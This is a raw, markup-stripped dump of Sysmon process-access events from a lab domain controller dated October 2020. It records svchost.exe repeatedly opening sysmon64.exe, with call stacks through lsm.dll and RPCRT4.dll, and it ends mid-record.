e871 10341000x80000000000000001253Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001252Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001251Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001250Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001249Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001248Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001247Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001246Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001245Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001244Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001243Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001242Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001241Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001240Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.121{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001239Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001238Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001237Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001236Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001235Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001234Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001233Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001232Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001231Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001230Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.105{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001229Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 